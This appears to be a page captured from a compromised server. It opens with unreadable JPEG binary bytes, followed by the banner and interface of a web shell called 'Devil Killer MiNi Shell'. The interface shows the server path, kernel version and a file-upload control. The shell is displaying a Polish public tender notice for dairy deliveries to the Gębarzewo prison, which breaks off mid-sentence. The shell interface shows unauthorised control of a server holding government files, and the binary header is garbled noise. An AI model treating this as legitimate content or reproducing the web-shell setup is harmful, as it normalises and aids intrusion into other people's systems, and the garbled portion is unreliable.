JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20211108/0026087801-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne dostawy przetworów mleczarskich do Zakładu Karnego w Gębarzewie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zakład Karny w Gębarzewie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000791131</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gębarzewo</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Żydowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">62-241</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL418 - Poznański</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">614292300</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">614262453</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk_gebarzewo@sw.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.sw.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Porządek i bezpieczeństwo publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne dostawy przetworów mleczarskich do Zakładu Karnego w Gębarzewie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bb32fb78-4073-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00260878</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00013041/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Sukcesywne dostawy przetworów mleczarskich</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.zp.swnet.sw.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl; zk_gebarzewo@sw.gov.pl; https://epuap.gov.pl/wps/portal</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz w Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Wszystkie dokumenty przekazane przez Wykonawcę muszą być podpisane kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/> a) Administratorem Pani/Pana/Państwa danych osobowych jest Zakład Karny w Gębarzewie. <br/> b) Dane kontaktowe Inspektora ochrony danych osobowych w Zakładzie Karnym w Gębarzewie, e-mail: zk_gebarzewo@sw.gov.pl, tel. 61 429 23 09.<br/> c) Pani/Pana/Państwa dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Sukcesywne dostawy przetworów mleczarskich do Zakładu Karnego w Gębarzewie”, nr sprawy: D/Kw.2232.4.2021, prowadzonym w na podstawie art. 275 pkt 1 ustawy Pzp;<br/> 2. Odbiorcami Pani/Pana/Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp.<br/> 3. Pani/Pana/Państwa dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/> 4. Obowiązek podania przez Panią/Pana/Państwo danych osobowych bezpośrednio Pani/Pana/Państwa dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/> 5. W odniesieniu do Pani/Pana/Państwa danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/> 6. Posiada Pani/Pan/Państwo:<br/> a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana/Państwo dotyczących;<br/> b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana/Państwo <br/>danych osobowych;<br/> c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/> d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana/Państwo dotyczących narusza przepisy RODO.<br/> 7. Nie przysługuje Pani/Panu/Państwu:<br/> a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana/Państwo <br/>danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>8. Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, ul. Stawki 2, 00-193 Warszawa.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D/Kw.2232.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 142702,75 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są sukcesywne dostawy przetworów mleczarskich w następującej ilości i asortymencie: <br/><br/>L p.<br/>Przedmiot zamówienia.<br/>Jednostka miary<br/>Szacunkowe ilości przedmiotu zamówienia *<br/><br/>1.<br/>Jogurt owocowy<br/>kg<br/>1200<br/><br/>2.<br/>Jogurt naturalny<br/>kg<br/>700<br/><br/>3.<br/>Maślanka naturalna<br/>l<br/>300<br/><br/>4.<br/>Mleko w proszku pełne<br/>kg<br/>700<br/><br/>5.<br/>Twarożek ziarnisty<br/>kg<br/>1200<br/><br/>6.<br/>Ser żółty twardy<br/>kg<br/>500<br/><br/>7.<br/>Ser topiony<br/>kg<br/>2000<br/><br/>8.<br/>Śmietana słodka 18%<br/>l<br/>400<br/><br/>9.<br/>Twarożek homogenizowany smakowy<br/>kg<br/>3400<br/><br/>10.<br/>Twaróg chudy<br/>kg<br/>3800<br/><br/>11.<br/>Ser typu fromage<br/>kg<br/>2100<br/><br/><br/>Wymagania klasyfikacyjne<br/><br/> 1) Jogurt owocowy <br/><br/>Cechy dyskwalifikujące:<br/> • niedopuszczalne jest wystąpienie objawów psucia, zjełczenia, zapleśnienia,<br/> • wystąpienie rozwarstwienia produktu, zmiana zabarwienia i jej niejednolitość, obce posmaki i zapachy,<br/> • rozwodnienie,<br/> • opakowania uszkodzone mechanicznie, nieoznakowane, zabrudzone.<br/><br/>Minimalny okres przydatności do spożycia wynosić będzie 14 dni od daty dostawy.<br/>Opakowanie jednostkowe kubek o pojemności 100g-150g wykonany z materiału przeznaczonego do kontaktu z żywnością.<br/><br/><br/> 2) Jogurt naturalny<br/><br/>Wygląd zewnętrzny – skrzep rozbity,<br/>Barwa i konsystencja – charakterystyczna dla użytych dodatków, jednolita, gęsta<br/>Smak i zapach – czysty lekko kwaśny,<br/><br/>Cechy dyskwalifikujące:<br/> • niedopuszczalne jest wystąpienie objawów psucia, zjełczenia, zapleśnienia,<br/> • wystąpienie rozwarstwienia produktu, zmiana zabarwienia i jej niejednolitość, obce posmaki i zapachy,<br/> • rozwodnienie,<br/> • opakowania uszkodzone mechanicznie, nieoznakowane, zabrudzone.<br/><br/>Minimalny okres przydatności do spożycia wynosić będzie 14 dni od daty dostawy.<br/>Opakowanie jednostkowe kubek o pojemności 100g-150g wykonany z materiału przeznaczonego do kontaktu z żywnością.<br/><br/><br/> 3) Maślanka naturalna <br/><br/>Cechy dyskwalifikujące:<br/>- niedopuszczalne jest wystąpienie objawów psucia, zjełczenia, zapleśnienia,<br/>- wystąpienie rozwarstwienia produktu, zmiana zabarwienia i jej niejednolitość, obce posmaki i zapachy,<br/>- rozwodnienie,<br/>- opakowania uszkodzone mechanicznie, nieoznakowane, zabrudzone.<br/><br/>Minimalny okres przydatności do spożycia wynosić będzie 14 dni od daty dostawy.<br/>Opakowanie jednostkowe o pojemności do 5l, winno być wykonane z materiału przeznaczonego do kontaktu z żywnością.<br/><br/><br/> 4) Mleko w proszku pełne <br/><br/>Zawartość tłuszczu nie mniej niż 25%.<br/>Wygląd: proszek sypki, jednolity, drobno rozpylony<br/>Barwa: biało kremowa, jednolita,<br/>Smak i zapach: typowy dla mleka pasteryzowanego, bez obcych smaków i zapachów, <br/>Cechy dyskwalifikujące:<br/> • zanieczyszczenia mechaniczne,<br/> • oznaki psucia,<br/> • trwałe zbrylenia, zmiana koloru, obce zapachy i posmaki<br/> • uszkodzenia mechaniczne opakowań, ich zanieczyszczenia, brak oznakowania.<br/>Minimalny okres przydatności do spożycia wynosić będzie 60 dni od daty dostawy.<br/>Opakowanie jednostkowe o masie do 25 kg wykonane z materiału przeznaczonego do kontaktu z żywnością.<br/><br/><br/>* Nie dopuszcza się wyrobów zastępczych np. zabielaczy do lodów. <br/><br/> 5) Twarożek ziarnisty<br/><br/>Cechy dyskwalifikujące:<br/> • niedopuszczalne jest wystąpienie objawów psucia, fermentacji, zjełczenia, zapleśnienia,<br/> • wystąpienie rozwarstwienia produktu, zmiana zabarwienia i jej niejednolitość, obce posmaki zapachy,<br/> • rozwodnienie,<br/> • opakowania uszkodzone mechanicznie, nieoznakowane, zabrudzone,<br/>Minimalny okres przydatności do spożycia wynosić będzie 14 dni od daty dostawy.<br/>Opakowanie jednostkowe kubek o pojemności 200 g wykonany z materiału przeznaczonego do kontaktu z żywnością.<br/><br/><br/> 6) Ser żółty twardy – ser podpuszczkowy dojrzewający wyrabiany z mleka pasteryzowanego o ustalonej zawartości tłuszczu, ser typu Gouda. <br/><br/>Konsystencja: miąższ elastyczny, zwarty, jednolity w całej masie<br/>Barwa: w serach niebarwionych naturalna, w serach barwionych jasnożółta, jednolita w całej masie,<br/>Smak i zapach: delikatny, lekki posmak pasteryzacji, aromatyczny <br/><br/>Cechy dyskwalifikujące:<br/> • niedopuszczalne jest wystąpienie objawów psucia, zjełczenia, zapleśnienia,<br/> • wystąpienie rozwarstwienia produktu, zmiana zabarwienia i jej niejednolitość, obce posmaki zapachy,<br/> • opakowania uszkodzone mechanicznie, nieoznakowane, zabrudzone,<br/> • zanieczyszczenia mechaniczne,<br/> • zdeformowane kształty<br/>Minimalny okres przydatności do spożycia wynosić będzie 60 dni od daty dostawy.<br/>Opakowanie jednostkowe w kształcie bloku, wykonane z materiału przeznaczonego do kontaktu z żywnością.<br/><br/>* Nie dopuszcza się wyrobów sero -podobnych. <br/><br/> 7) Ser topiony – produkt powstały przy użyciu topników z serów podpuszczkowych dojrzewających jako podstawowego surowca oraz z innych produktów mleczarskich, z dodatkami pochodzenia roślinnego. <br/><br/>Wygląd zewnętrzny - opakowanie bezpośrednie sera topionego powinno być nieuszkodzone; kształt poszczególnych jednostek opakunkowych regularny, powierzchnia gładka; <br/>Barwa i konsystencja – jednolita, bez ziarnistości, konsystencja smarowna<br/>Smak i zapach – charakterystyczny dla odpowiedniego sera naturalnego klasy I, z którego wyprodukowano ser lub dla danego rodzaju dodatku, ze swoistym posmakiem topienia<br/>Cechy dyskwalifikujące:<br/> 1) niedopuszczalne jest wystąpienie objawów psucia, zjełczenia, zapleśnienia,<br/> 2) wystąpienie rozwarstwienia produktu, zmiana zabarwienia i jej niejednolitość, obce posmaki i zapachy,<br/> 3) opakowania uszkodzone mechanicznie, nieoznakowane, zabrudzone,<br/> 4) smak jełki, piekący, mdły, gorzki<br/><br/>Minimalny okres przydatności do spożycia wynosić będzie 60 dni od daty dostawy.<br/>Opakowanie jednostkowe kostka o pojemności 100g wykonana z materiału przeznaczonego do kontaktu z żywnością.<br/><br/>* Nie dopuszcza się wyrobów seropodobnych. <br/> <br/> 8) Śmietana słodka 18%<br/><br/>Wygląd i barwa – płyn jednorodny, barwa jednolita od jasnokremowej do kremowej<br/>Konsystencja -płynna, gęstawa, jednolita w całej masie<br/>Zawartość tłuszczu -18%<br/>Cechy dyskwalifikujące:<br/> • niedopuszczalne jest wystąpienie objawów psucia, zjełczenia, zapleśnienia,<br/> • wystąpienie rozwarstwienia produktu, zmiana zabarwienia i jej niejednolitość, obce posmaki i zapachy,<br/> • rozwodnienie,<br/> • opakowania uszkodzone mechanicznie, nieoznakowane, zabrudzone.<br/>Minimalny okres przydatności do spożycia wynosić będzie 14 dni od daty dostawy.<br/>Opakowanie jednostkowe- kubek o pojemności do 1 litra wykonany z materiału przeznaczonego do kontaktu z żywnością.<br/><br/> 9) Twarożek homogenizowany smakowy<br/><br/>Smak i zapach – czysty, łagodny, lekko kwaśny posmak pasteryzacji o wyraźnym smaku <br/> i zapachu użytych dodatków<br/>Konsystencja i struktura -jednolita, zwarta, widoczne cząstki użytych dodatków<br/>Barwa -charakterystyczna dla użytych dodatków, jednolita w całej masie<br/>Cechy dyskwalifikujące:<br/>- niedopuszczalne jest wystąpienie objawów psucia, zjełczenia, zapleśnienia,<br/>- wystąpienie rozwarstwienia produktu, zmiana zabarwienia i jej niejednolitość, obce posmaki i zapachy,<br/>- opakowania uszkodzone mechanicznie, nieoznakowane, zabrudzone.<br/><br/>Minimalny okres przydatności do spożycia wynosić będzie 30 dni od daty dostawy.<br/>Opakowanie jednostkowe kubek o pojemności 150g-200g wykonany z materiału przeznaczonego do kontaktu z żywnością.<br/><br/><br/> 10) Twaróg chudy – ser twarogowy chudy niedojrzewający zwany twarogiem, wyprodukowany z mleka pasteryzowanego przez odpowiednią obróbkę skrzepu uzyskanego przez dodatek zakwasu czystych kultur mleczarskich lub zakwasu czystych kultur mleczarskich i podpuszczki. <br/><br/>Smak i zapach – czysty, łagodny, lekko kwaśny posmak pasteryzacji,<br/>Konsystencja i struktura – jednolita, zwarta, bez grudek<br/>Barwa -biała do lekko kremowej, jednolita w całej masie<br/>Cechy dyskwalifikujące:<br/> • niedopuszczalne jest wystąpienie objawów psucia, fermentacji, zjełczenia, zapleśnienia,<br/> • wystąpienie rozwarstwienia produktu, zmiana zabarwienia i jej niejednolitość, obce posmaki i zapachy,<br/> • rozwodnienie,<br/> • opakowania uszkodzone mechanicznie, nieoznakowane, zabrudzone.<br/><br/>Minimalny okres przydatności do spożycia wynosić będzie 14 dni od daty dostawy.<br/>Opakowanie jednostkowe kostka o wadze do 200g w papierze pergaminowym lub opakowanie do 5 kg po uzgodnieniu z Zamawiającym.<br/><br/> 11) Ser typu fromage<br/><br/>Smak i zapach – czysty, łagodny, lekko kwaśny posmak pasteryzacji o wyraźnym smaku i zapachu użytych dodatków<br/>Konsystencja i struktura -jednolita, zwarta, widoczne cząstki użytych dodatków<br/>Barwa -charakterystyczna dla użytych dodatków, jednolita w całej masie<br/>Cechy dyskwalifikujące:<br/> • niedopuszczalne jest wystąpienie objawów psucia, zjełczenia, zapleśnienia,<br/> • wystąpienie rozwarstwienia produktu, zmiana zabarwienia i jej niejednolitość, obce posmaki i zapachy,<br/> • opakowania uszkodzone mechanicznie, nieoznakowane, zabrudzone.<br/><br/>Minimalny okres przydatności do spożycia wynosić będzie 30 dni od daty dostawy.<br/>Opakowanie jednostkowe kubek lub kostka o wadze 80g-200g wykonana z materiału przeznaczonego do kontaktu z żywnością.<br/><br/>Znakowanie produktów<br/><br/> Na opakowaniu jednostkowym winny być podane następujące informacje:<br/> • nazwa produktu,<br/> • wykaz składników,<br/> • termin przydatności do spożycia,<br/> • nazwę dostawcy – producenta, adres,<br/> • zawartość netto,<br/> • warunki przechowywania,<br/> • oznaczenie partii produkcyjnej,<br/> • zawartość tłuszczu,<br/><br/>Dostarczane partie produktów w ramach częściowych dostaw winny być jednakowego gatunku, gramatury, rodzaju (dodatek smakowy) oraz terminu przydatności do spożycia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15511700-0 - Mleko w proszku</p> <p class="mb-0">15512000-0 - Śmietana</p> <p class="mb-0">15542100-0 - Ser twarogowy</p> <p class="mb-0">15542200-1 - Ser miękki</p> <p class="mb-0">15544000-3 - Ser twardy</p> <p class="mb-0">15551300-8 - Jogurt</p> <p class="mb-0">15551310-1 - Jogurt bez dodatków substancji smakowych</p> <p class="mb-0">15551500-0 - Maślanka</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Kryteria oceny ofert - zamawiający uzna oferty za spełniające wymagania i przyjmie do szczegółowego rozpatrywania, jeżeli:<br/>1) oferta spełnia wymagania określone niniejszą specyfikacją,<br/>2) oferta została złożona w określonym przez zamawiającego terminie,<br/>3) wykonawca przedstawił ofertę zgodną co do treści z wymaganiami zamawiającego,	<br/> 2. Za parametry najkorzystniejsze w danym kryterium oferta otrzyma maksymalną liczbę punktów ustaloną w poniższym opisie, pozostałe będą oceniane odpowiednio - proporcjonalnie do parametru najkorzystniejszego. Wybór oferty dokonany zostanie na podstawie opisanych kryteriów i ustaloną punktację. Maksymalna liczba punktów, jaką po uwzględnieniu wagi może osiągnąć oferta wynosi 100 pkt. <br/> 3. Za najkorzystniejszą zostanie uznana oferta, która uzyska najwyższą liczbę punktów obliczonych w oparciu o ustalone kryteria przedstawione w tabeli: <br/><br/>NAZWA KRYTERIUM<br/><br/>WAGA KRYTERIUM<br/><br/>CENA<br/><br/>60 %<br/><br/>TERMIN PŁATNOŚCI<br/><br/>40 %<br/><br/> 4. Oferta wypełniająca w najwyższym stopniu wymagania określone w każdym kryterium otrzyma maksymalną liczbę punktów. Pozostałym Wykonawcom, wypełniającym wymagania kryterialnie przypisana zostanie odpowiednio mniejsza (proporcjonalnie mniejsza) liczba punktów. Wynik będzie traktowany jako wartość punktowa oferty.<br/><br/> 5. Zastosowane wzory do obliczenia punktowego. <br/><br/> 1) Nazwa kryterium: CENA<br/><br/>Wykonawca, który przedstawi najniższą cenę otrzyma 60 pkt. Pozostali <br/>Wykonawcy otrzymają odpowiednio mniej punktów, stosownie do wzoru:<br/><br/> O = (Cmin/Cof) x 60<br/><br/>Sposób oceny: <br/>Ze wszystkich złożonych ofert wybiera się ofertę, której cena jest najniższa.<br/>Stanowi ona Cmin w podanym wyżej wzorze. Cof to cena oferty dla której<br/>dokonuje się obliczeń. Do obliczeń Zamawiający będzie brał pod uwagę tylko<br/>cenę brutto ofert – zgodnie z art. 2 pkt. 1 ustawy.<br/><br/> 2) Nazwa kryterium: 